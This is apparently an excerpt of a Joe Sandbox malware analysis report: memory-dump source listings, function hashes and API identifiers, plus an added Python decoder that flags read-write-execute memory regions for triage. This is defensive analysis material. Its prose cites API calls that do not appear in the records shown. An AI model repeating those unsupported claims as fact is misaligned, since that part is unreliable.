                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                              • Instruction ID: 6360eb046ed9bbe6610f0eb93b80c417d709762e4dd0583c7a35c0a0dd1e9c1b
                                                              • Opcode Fuzzy Hash: 23fe133b6f3189abf78f0258856cb74c0ef8cfe774ed9d6b2b97d20fe01198e3
                                                              • Instruction Fuzzy Hash: 54D05BBA30D1502AA210615A1D54D7B5BECCBC5761F00447EF54CC6240D2008C06D6B1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID:
                                                              • API String ID: 481472006-0
                                                              • Opcode ID: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                              • Instruction ID: 403bb07b511902f02fbf32892024513a148737767c0b597a6c10b1a2eb730c68
                                                              • Opcode Fuzzy Hash: b1eecd68d2e37ad01dc8be627e7f9539d8c1b79e2157fe00e2d627bfaf393da5
                                                              • Instruction Fuzzy Hash: BBA01100808820028A803B280C022BA3288AA00A20FC80F80A8FC802E0EE2E022080E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                                              • Instruction ID: 748e9d5cc255629920f8d182309d65a9a38ae5ca9a0c5214da6f11aa260e6cd6
                                                              • Opcode Fuzzy Hash: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                                              • Instruction Fuzzy Hash: 0251656160074497DB388A7C896B7BE23D69BE7208F08090EDC86CBB91C716D745F7A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                                              • Instruction ID: 193d1528932dabfa2e32e0d2aa56950597b4fcd954de0963cd3a5689a2e22000
                                                              • Opcode Fuzzy Hash: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                                              • Instruction Fuzzy Hash: 2B517A75200B4957DF3C8568886BBFE23969BC3308F580A0EC886CBE81C745D706F7A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                              • Instruction ID: ee8ba100d01ce1a23de1b435dc5d626b600eb74c72d6f0b6874d42d6fb0319c0
                                                              • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                              • Instruction Fuzzy Hash: 63518271D002098FDB28CFAAD98679EBBF4FB49314F14C56AD415EB250E3B59600DFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                              • Instruction ID: 6b9335b83b596985e5fadea341da1c2e10ba33c14a9727546ccefacb09d296b4
                                                              • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                              • Instruction Fuzzy Hash: C64128719183848BC340CF29C58020AFBE5FFC8318F645A1EF899A3350D375EA92CB82
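The "Memory Dump Source" entries above name one dump file per memory region, and the numeric fields of those names carry the information a triager actually wants: which region a function was lifted from, and whether that region was writable and executable at the same time. In this report the functions that call real imports (GetDiskFreeSpaceA, GetLocaleInfoA, GetVersionExA) come from the region at 02B81000 with protection 00000020, while the string-only functions come from 02BE1000 with protection 00000040. Read as Windows page-protection constants, that is PAGE_EXECUTE_READ for the mapped image code and PAGE_EXECUTE_READWRITE for a region that was written at runtime, which is where unpacked loader or payload code normally lives. The decoder below is an added example, not part of the Joe Sandbox report or its IDA plugin. It assumes the dump-file name layout `<process index>.<phase>.<dump id>.<region base>.<protect>.<state>.<type>.<reserved>.sdmp`, which is an assumption inferred from the names on this page rather than a documented format; the sample lines are copied from the report above, including the "Download File" link text that the page rendering fuses onto the names.

```python
"""Decode Joe Sandbox .sdmp region names and flag RWX regions (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Windows memory constants (winnt.h) used to name the numeric fields.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout of a .sdmp name (inferred from the report, not documented):
# <proc index>.<phase>.<dump id>.<region base>.<protect>.<state>.<type>.<reserved>.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<state>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<extra>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    proc_index: int
    phase: int
    dump_id: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Mask modifier bits (PAGE_GUARD 0x100, PAGE_NOCACHE 0x200) before lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def is_rwx(self) -> bool:
        # Writable and executable at once: code that was written at runtime.
        return (self.protect & 0xFF) == 0x40


def parse_sdmp_name(name: str) -> DumpRegion:
    """Decode one .sdmp file name; raises ValueError if it does not match."""
    m = SDMP_RE.search(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(
        proc_index=int(m["proc"], 16), phase=int(m["phase"], 16),
        dump_id=int(m["dump"]), base=int(m["base"], 16),
        protect=int(m["protect"], 16), state=int(m["state"], 16),
        mem_type=int(m["mtype"], 16),
    )


def parse_report_lines(lines: List[str]) -> List[DumpRegion]:
    """Collect every distinct region named on 'Source File:'/'Associated:' lines."""
    seen: Dict[int, DumpRegion] = {}
    for line in lines:
        if "Source File:" not in line and "Associated:" not in line:
            continue
        # search() tolerates the "Download File" link text fused to the name.
        m = SDMP_RE.search(line)
        if m is not None:
            region = parse_sdmp_name(m.group(0))
            seen.setdefault(region.base, region)
    return [seen[base] for base in sorted(seen)]


def rwx_regions(regions: List[DumpRegion]) -> List[DumpRegion]:
    return [r for r in regions if r.is_rwx]


# Constructed sample: one "Memory Dump Source" block copied from the report above.
SAMPLE_LINES = [
    "• Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true",
    "• Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File",
    "• Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File",
    "• Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File",
    "• Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File",
    "• Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File",
    "• Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File",
    "• Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File",
]

if __name__ == "__main__":
    for r in parse_report_lines(SAMPLE_LINES):
        flag = "  <- RWX, candidate for unpacked code" if r.is_rwx else ""
        print(f"{r.base:08X} {r.protect_name:<24} {r.state_name:<10} {r.type_name}{flag}")
```

Run against the sample block, the decoder lists eight regions: the PE header at 02B80000 as PAGE_READONLY, the image code at 02B81000 as PAGE_EXECUTE_READ, two PAGE_READWRITE data regions, and four PAGE_EXECUTE_READWRITE regions starting at 02BE1000. When triaging a report like this one, the RWX regions are the dumps to carve first, since functions lifted from them (the string-only records above) were not present in the file on disk.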
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a167c47b947a2d167f9736c7abfbb916f4b164e61a8b0a90e48ac4e87c27f6f
                                                              • Instruction ID: 63f089182bff02a2f7f77b91a4dba73539204a6224ebef8258cab377cbf73f91
                                                              • Opcode Fuzzy Hash: 7a167c47b947a2d167f9736c7abfbb916f4b164e61a8b0a90e48ac4e87c27f6f
                                                              • Instruction Fuzzy Hash: D6323832D69F114DD7239634C8713396249AFB72D9F16D737F81AB5AA6EF29C2838100
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 060025514b5461435c7783c1aca17067d38322f5e92d370795537057d43cc155
                                                              • Instruction ID: 912cadc4c358afb0086358dddd56668dcbc0ef348c69982f67fbb2b0dfb15214
                                                              • Opcode Fuzzy Hash: 060025514b5461435c7783c1aca17067d38322f5e92d370795537057d43cc155
                                                              • Instruction Fuzzy Hash: 8F32F6316087459BC7A5CF28C48077AF7E2FF84318F044AADFA958B2A1D774D949CB92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b6974f5b355a7b78d789d685a6035d14b980cf6f1687f72e4ce4153e0b94ddb
                                                              • Instruction ID: e578c614270701888f8651a621406f0b0abcfff17e83a5e636c00fdbb5b725b5
                                                              • Opcode Fuzzy Hash: 2b6974f5b355a7b78d789d685a6035d14b980cf6f1687f72e4ce4153e0b94ddb
                                                              • Instruction Fuzzy Hash: 15E1C772A042006BCF44B7788C65D7F76EB9FD1700F4049DDEA47A72D2EF659A088E92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9ad16798d89cc847e280ebfd23893692ba583267ff92785f21bf8c1a35f6125b
                                                              • Instruction ID: db8c75180e15dc43e59d6c3112b688c7430dc0a53add07573e85a8be8ac20d40
                                                              • Opcode Fuzzy Hash: 9ad16798d89cc847e280ebfd23893692ba583267ff92785f21bf8c1a35f6125b
                                                              • Instruction Fuzzy Hash: 3EF18D356146558FC344DF1DE89182FB3E1FB89306F84092EE182C3391EB74EA25DBA6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44a6e234f78c41bf9ab829f3e543dec93c59b1fba027f8c12c5dbce5ba7d0ea3
                                                              • Instruction ID: a6956ba3efe5fd282b60c1a78db83bad6946c36f8c14cd36c84d732f04126649
                                                              • Opcode Fuzzy Hash: 44a6e234f78c41bf9ab829f3e543dec93c59b1fba027f8c12c5dbce5ba7d0ea3
                                                              • Instruction Fuzzy Hash: 9EB19F7911429A8ACB15EF68C4913F63BA1EF6A300F0850B9ED9CCF757E3358506EB64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
                                                              • Instruction ID: 1685ccd6c252db2e0cdcb2da8f36b38e0b159c279f421604fff951c35e619d94
                                                              • Opcode Fuzzy Hash: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
                                                              • Instruction Fuzzy Hash: 06B14D716106089FD716CF2CC486BA57BE1FF45368F298A58E899CF2A1C375DA81CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                                              • Instruction ID: 4ca005b500de491105e5eac5776a714074d4ac096756171ff542b134164f37b4
                                                              • Opcode Fuzzy Hash: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                                              • Instruction Fuzzy Hash: 4D61787120470966DB389E6C5893BBE2395BBC7308F00092DD843CBE90D711EB42F7A5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e527c4e480a832a5ffd7bd4446f4a4d5879b4a9202d666d113e148d51cfd504
                                                              • Instruction ID: e347dd78727417d37b1a299ca99dfd43001cb81d3726199aacb8aa596bef3312
                                                              • Opcode Fuzzy Hash: 2e527c4e480a832a5ffd7bd4446f4a4d5879b4a9202d666d113e148d51cfd504
                                                              • Instruction Fuzzy Hash: 8C615B729083059FC308DF35D581A5FB7E9AFCC718F544E2EF49996290E731EA089B92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                              Memory Dump Source
